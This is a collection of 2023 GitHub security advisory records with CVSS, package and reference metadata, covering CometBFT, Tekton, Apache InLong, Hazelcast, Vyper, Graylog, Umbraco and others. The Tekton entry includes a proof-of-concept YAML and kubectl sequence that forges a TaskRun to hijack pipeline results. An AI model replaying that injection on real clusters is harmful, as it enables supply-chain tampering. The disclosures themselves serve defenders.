[{'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37460'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2'}, {'type': 'PACKAGE', 'url': 'https://github.com/codehaus-plexus/plexus-archiver'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T17:20:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mvj3-qrqh-cjvr
|
2023-07-18T19:15:58Z
|
2023-07-05T21:33:48Z
| null |
['CVE-2023-34450']
|
CometBFT PeerState JSON serialization deadlock
|
### Impact
An internal modification to the way struct `PeerState` is serialized to JSON introduced a deadlock when new function MarshallJSON is called. This function can be called from two places:
1. Via logs
* Setting the `consensus` logging module to "debug" level (should not happen in production), and
* Setting the log output format to JSON
2. Via RPC `dump_consensus_state`
Case 1 above, which should not be hit in production, will eventually hit the deadlock in most goroutines, effectively halting the node.
In case 2, only the data structures related to the first peer will be deadlocked, together with the thread(s) dealing with the RPC request(s). This means that only one of the channels of communication to the node's peers will be blocked. Eventually the peer will timeout and excluded from the list (typically after 2 minutes). The goroutines involved in the deadlock will not be garbage collected, but they will not interfere with the system after the peer is excluded.
The theoretical worst case for case 2, is a network with only two validator nodes. In this case, each of the nodes only has one `PeerState` struct. If `dump_consensus_state` is called in either node (or both), the chain will halt until the peer connections time out, after which the nodes will reconnect (with different `PeerState` structs) and the chain will progress again. Then, the same process can be repeated.
As the number of nodes in a network increases, and thus, the number of peer struct each node maintains, the possibility of reproducing the perturbation visible with 2 nodes decreases. Only the first `PeerState` struct will deadlock, and not the others (RPC `dump_consensus_state` accesses them in a for loop, so the deadlock at the first iteration causes the rest of the iterations of that "for" loop to never be reached).
This regression was introduced in versions `v0.34.28` and `v0.37.1`, and will be fixed in `v0.34.29` and `v0.37.2`.
### Patches
The PR containing the fix is [here](https://github.com/cometbft/cometbft/pull/865), and the corresponding issue is [here](https://github.com/cometbft/cometbft/pull/863)
### Workarounds
For case 1 (hitting the deadlock via logs)
* either don't set the log output to "json", leave at "plain",
* or don't set the consensus logging module to "debug", leave it at "info" or higher.
For case 2 (hitting the deadlock via RPC `dump_consensus_state`)
* do not expose `dump_consensus_state` RPC endpoint to the public internet (e.g., via rules in your nginx setup)
### References
* [Issue](https://github.com/cometbft/cometbft/pull/863) that introduced the deadlock
* [Issue](https://github.com/cometbft/cometbft/pull/524) reporting the bug via logs
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.34.28'}, {'fixed': '0.34.29'}]}], 'versions': ['0.34.28']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.37.1'}, {'fixed': '0.37.2'}]}], 'versions': ['0.37.1']}]
|
[{'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/security/advisories/GHSA-mvj3-qrqh-cjvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34450'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/524'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/863'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/865'}, {'type': 'PACKAGE', 'url': 'https://github.com/cometbft/cometbft'}]
|
{'cwe_ids': ['CWE-401', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:33:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w2h3-vvvq-3m53
|
2023-07-07T18:46:19Z
|
2023-07-07T18:46:19Z
| null |
['CVE-2023-37264']
|
Pipelines do not validate child UIDs
|
### Summary
Pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task.
We should add UID to PipelineRun status and validate that child Run status/results only come from Runs matching the same UID.
### Details
While we [store and validate the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference](https://github.com/tektoncd/pipeline/blob/2d38f5fa840291395178422d34b36b1bc739e2a2/pkg/reconciler/pipelinerun/pipelinerun.go#L1358-L1372), we only store (api version, kind, name) in the [ChildStatusReference](https://pkg.go.dev/github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1#ChildStatusReference) .
This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements.
I believe this is also true for [TaskRuns -> Pods since it looks like we only lookup by name](https://github.com/tektoncd/pipeline/blob/0b8349b770a76877051c9c790c94bf9ed897c75c/test/pipelinerun_test.go#L992), though I haven't tested this.
If you have update permissions on tekton resources, you could also perform a similar bypass like this (because it's difficult to distinguish this from a Task retry). For now, I think relying on RBAC is fine and treat update as a privileged role (though we should perhaps update docs to stress this). Create is the most problematic for now. SPIFFE/SPIRE might be able to help with ensuring that only the controller can modify state long term (e.g. sign the expected UIDs?)
### PoC
```yaml
apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: PipelineRun
metadata:
name: hello-pr
spec:
pipelineSpec:
tasks:
- name: task1
taskSpec:
steps:
- name: echo
image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
script: |
sleep 60
- name: task2
runAfter: [task1]
taskSpec:
steps:
- name: echo
image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
script: |
echo "asdf" > $(results.foo.path)
results:
- name: foo
results:
- name: foo
value: $(tasks.task2.results.foo)
```
Once this is running, grab the PR UID:
```sh
$ k get pr hello-pr -o json | jq .metadata.uid -r
```
While pipeline is running task 1, start fake task 2:
```yaml
apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: TaskRun
metadata:
annotations:
labels:
[app.kubernetes.io/managed-by](http://app.kubernetes.io/managed-by): tekton-pipelines
[tekton.dev/memberOf](http://tekton.dev/memberOf): tasks
[tekton.dev/pipeline](http://tekton.dev/pipeline): hello-pr
[tekton.dev/pipelineRun](http://tekton.dev/pipelineRun): hello-pr
[tekton.dev/pipelineTask](http://tekton.dev/pipelineTask): task2
name: hello-pr-task2
namespace: default
ownerReferences:
- apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
blockOwnerDeletion: true
controller: true
kind: PipelineRun
name: hello-pr
uid: af549647-4532-468b-90c5-29122a408f8d <--- this should be UID of PR fetched in last step
spec:
serviceAccountName: default
taskSpec:
results:
- name: foo
type: string
steps:
- image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
name: echo
resources: {}
script: |
echo "zxcv" > $(results.foo.path)
```
Get pipeline results - it shows the output of the 2nd injected TaskRun
```
$ k get pr -o json hello-pr | jq .status.pipelineResults
[
{
"name": "foo",
"value": "zxcv\n"
}
]
```
### Impact
This can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on your Tekton setup. **If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities**.
Worst case example would be a supply chain attack where a malicious TaskRun triggered from Triggers/Workflows intercepts and replaces a task in a trusted Pipeline.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/tektoncd/pipeline'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.35.0'}, {'last_affected': '0.49.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tektoncd/pipeline/security/advisories/GHSA-w2h3-vvvq-3m53'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37264'}, {'type': 'PACKAGE', 'url': 'https://github.com/tektoncd/pipeline'}, {'type': 'WEB', 'url': 'https://github.com/tektoncd/pipeline/blob/2d38f5fa840291395178422d34b36b1bc739e2a2/pkg/reconciler/pipelinerun/pipelinerun.go#L1358-L1372'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1#ChildStatusReference'}]
|
{'cwe_ids': ['CWE-345'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T18:46:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q5p5-xg93-2jqc
|
2023-07-06T23:31:27Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31062']
|
Apache InLong Improper Privilege Management vulnerability
|
Improper Privilege Management Vulnerabilities in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. When the attacker has access to a valid (but unprivileged) account, the exploit can be executed using Burp Suite by sending a login request and following it with a subsequent HTTP request using the returned cookie.
Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-dao'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31062'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7836'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/btorjbo9o71h22tcvxzy076022hjdzq0'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:31:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-c5vj-wp4v-mmvx
|
2023-07-19T22:08:40Z
|
2023-07-19T22:08:40Z
| null |
['CVE-2023-33265']
|
Hazelcast Executor Services don't check client permissions properly
|
### Impact
In Hazelcast Platform, 5.0 through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, and Hazelcast IMDG (all versions up to 4.2.z), Executor Services don't check client permissions properly, allowing authenticated users to execute tasks on members without the required permissions granted.
### Patches
Fix versions: 5.3.0, 5.2.4, 5.1.7, 5.0.5
### Workarounds
Users are only affected when they already use executor services (i.e., an instance exists as a distributed data structure).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.4'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/security/advisories/GHSA-c5vj-wp4v-mmvx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33265'}, {'type': 'PACKAGE', 'url': 'https://github.com/hazelcast/hazelcast'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.0.5'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.1.7'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.2.4'}, {'type': 'WEB', 'url': 'https://support.hazelcast.com/s/article/Security-Advisory-for-CVE-2023-33265'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:08:40Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f5x6-7qgp-jhf3
|
2023-09-08T21:09:19Z
|
2023-07-25T17:46:19Z
| null |
['CVE-2023-37902']
|
ecrecover can return undefined data if signature does not verify
|
### Impact
the ecrecover precompile does not fill the output buffer if the signature does not verify, see https://github.com/ethereum/go-ethereum/blob/b058cf454b3bdc7e770e2b3cec83a0bcb48f55ee/core/vm/contracts.go#L188. however, the ecrecover builtin will still return whatever is at memory location 0.
this means that the if the compiler has been convinced to write to the 0 memory location with specially crafted data (generally, this can happen with a hashmap access or immutable read) just before the ecrecover, a signature check might pass on an invalid signature.
A contract search was performed. Most uses of `ecrecover` are used for erc2612-style permit implementations, which typically look like:
```vyper
assert _owner != empty(address)
assert block.timestamp <= _deadline
nonce: uint256 = self.nonces[_owner]
digest: bytes32 = keccak256(
concat(
b"\x19\x01",
self.DOMAIN_SEPARATOR,
keccak256(_abi_encode(PERMIT_TYPEHASH, _owner, _spender, _value, nonce, _deadline))
)
)
assert ecrecover(digest, convert(_v, uint256), convert(_r, uint256), convert(_s, uint256)) == _owner
```
in this case, the immutable `PERMIT_TYPEHASH` is loaded into `ecrecover`'s output buffer right before `ecrecover()`, and so the output of `ecrecover()` here when the signature is invalid will be the value of `PERMIT_TYPEHASH`. in this case, since `PERMIT_TYPEHASH` is not a valid address, it will never compare `==` to `_owner`, and so the behaviour is exactly the same as if `ecrecover()` returned 0 in this case.
in general, a contract could have unexpected behavior (i.e. mistakenly pass this style of signature check) if an immutable representing a real address (ex. `OWNER`) was read right before the `ecrecover` operation.
### Patches
v0.3.10 (with 019a37ab98ff53f04fecfadf602b6cd5ac748f7f and #3586)
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
### References
_Are there any links users can visit to find out more?_
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-f5x6-7qgp-jhf3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37902'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/019a37ab98ff53f04fecfadf602b6cd5ac748f7f'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-133.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]
|
{'cwe_ids': ['CWE-252'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T17:46:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2q4p-f6gf-mqr5
|
2023-08-31T18:52:56Z
|
2023-07-06T20:53:15Z
| null |
['CVE-2023-41044']
|
Graylog server has partial path traversal vulnerability in Support Bundle feature
|
A partial path traversal vulnerability exists in Graylog's [Support Bundle](https://go2docs.graylog.org/5-1/making_sense_of_your_log_data/cluster_support_bundle.htm) feature. The vulnerability is caused by incorrect user input validation in an HTTP API resource.
Thanks to weiweiwei9811 for reporting this vulnerability and providing detailed information.
### Impact
Graylog's Support Bundle feature allows an attacker with valid Admin role credentials to download or delete files in sibling directories of the support bundle directory.
The default `data_dir` in operating system packages (DEB, RPM) is set to `/var/lib/graylog-server`. The data directory for the Support Bundle feature is always `<data_dir>/support-bundle`.
Due to the partial path traversal vulnerability, an attacker with valid Admin role credentials can read or delete files in directories that start with a `/var/lib/graylog-server/support-bundle` directory name.
The vulnerability would allow the download or deletion of files in the following example directories.
- `/var/lib/graylog-server/support-bundle-test`
- `/var/lib/graylog-server/support-bundlesdirectory`
For the [Graylog](https://hub.docker.com/r/graylog/graylog) and [Graylog Enterprise](https://hub.docker.com/r/graylog/graylog-enterprise) Docker images, the `data_dir` is set to `/usr/share/graylog/data` by default.
### Patches
The vulnerability is fixed in Graylog version 5.1.3 and later.
### Workarounds
Block all HTTP requests to the following HTTP API endpoints by using a reverse proxy server in front of Graylog.
- `GET /api/system/debug/support/bundle/download/{filename}`
- `DELETE /api/system/debug/support/bundle/{filename}`
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.graylog2:graylog2-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-2q4p-f6gf-mqr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41044'}, {'type': 'WEB', 'url': 'https://github.com/Graylog2/graylog2-server/commit/02b8792e6f4b829f0c1d87fcbf2d58b73458b938'}, {'type': 'PACKAGE', 'url': 'https://github.com/Graylog2/graylog2-server'}, {'type': 'WEB', 'url': 'https://go2docs.graylog.org/5-1/making_sense_of_your_log_data/cluster_support_bundle.htm'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T20:53:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-2xvx-368h-qcmv
|
2023-07-31T22:02:15Z
|
2023-07-31T03:30:23Z
| null |
['CVE-2023-4006']
|
phpMyFAQ Improper Neutralization of Formula Elements in a CSV File vulnerability
|
Improper Neutralization of Formula Elements in a CSV File in GitHub repository thorsten/phpmyfaq prior to 3.1.16.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.16'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4006'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/03946eca488724251eaed8d9d36fed92e6d8fd22'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/36149a42-cbd5-445e-a371-e351c899b189'}]
|
{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:02:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7xr2-8ff7-6fjq
|
2023-07-14T21:59:13Z
|
2023-07-14T21:59:13Z
| null |
['CVE-2023-37473']
|
zenstruck/collection passing callable string to EntityRepository::find() and query()
|
### Impact
Passing _callable strings_ (ie `system`) caused the function to be executed.
### Patches
Fixed in [v0.2.1](https://github.com/zenstruck/collection/releases/tag/v0.2.1).
### Workarounds
Do not allow passing user strings to `EntityRepository::find()` or `query()`.
### References
[Fix commit](https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'zenstruck/collection'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/security/advisories/GHSA-7xr2-8ff7-6fjq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37473'}, {'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c'}, {'type': 'PACKAGE', 'url': 'https://github.com/zenstruck/collection'}, {'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/releases/tag/v0.2.1'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:59:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h8wc-r4jh-mg7m
|
2023-07-13T17:02:07Z
|
2023-07-13T17:02:07Z
| null |
['CVE-2023-37267']
|
Umbraco allows possible Admin-level access to backoffice without Auth under rare conditions
|
Under rare conditions, a restart of Umbraco can allow unauthorized users to gain admin-level permissions.
### Impact
An unauthorized user gaining admin-level access and permissions to the backoffice.
### Patches
10.6.1, 11.4.2, 12.0.1
### Workarounds
* Enabling the [Unattended Install](https://docs.umbraco.com/umbraco-cms/reference/configuration/unattendedsettings) feature will mean the vulnerability is not exploitable.
* Enabling IP restrictions to `*/install/*` and `*/umbraco/*` will limit the exposure to allowed IP addresses.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '10.6.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.0.1'}]}], 'versions': ['12.0.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '10.6.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.0.1'}]}], 'versions': ['12.0.0']}]
|
[{'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-h8wc-r4jh-mg7m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37267'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/1f26f2c6f3428833892cde5c6d8441fb041e410e'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/20a4e475c8d7b91d263e4e103ef19f3644e7b569'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/82eae48d098b9deecbdf86cf288b2b18020e1fed'}, {'type': 'PACKAGE', 'url': 'https://github.com/umbraco/Umbraco-CMS'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T17:02:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fj8f-56wc-q36r
|
2023-07-28T21:37:28Z
|
2023-07-17T09:30:23Z
| null |
['CVE-2023-26512']
|
rabbitmq-connector plugin module in Apache EventMesh platforms allows attackers to send controlled message
|
CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and
remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, the new version is set to be released as soon as possible.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.eventmesh:eventmesh-connector-rabbitmq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'last_affected': '1.8.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26512'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zb1d62wh8o8pvntrnx4t1hj8vz0pm39p'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T21:37:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f28g-86hc-823q
|
2023-07-13T19:56:19Z
|
2023-07-13T19:56:19Z
| null |
[]
|
Tokenizer vulnerable to client brute-force of token secrets
|
### Impact
Authorized clients, having an `inject_processor` secret, could brute-force the secret token value by abusing the `fmt` parameter to the `Proxy-Tokenizer` header.
### Patches
This was fixed in https://github.com/superfly/tokenizer/pull/8 and further mitigated in https://github.com/superfly/tokenizer/pull/9.
|
[]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/superfly/tokenizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/security/advisories/GHSA-f28g-86hc-823q'}, {'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/pull/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/superfly/tokenizer'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T19:56:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f475-jgg3-3jwc
|
2023-07-06T23:40:45Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31206']
|
Apache InLong Exposure of Resource to Wrong Sphere vulnerability
|
Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong from 1.4.0 through 1.6.0. Attackers can change the immutable name and type of nodes of InLong. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7891 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-dao'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-test'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}]
|
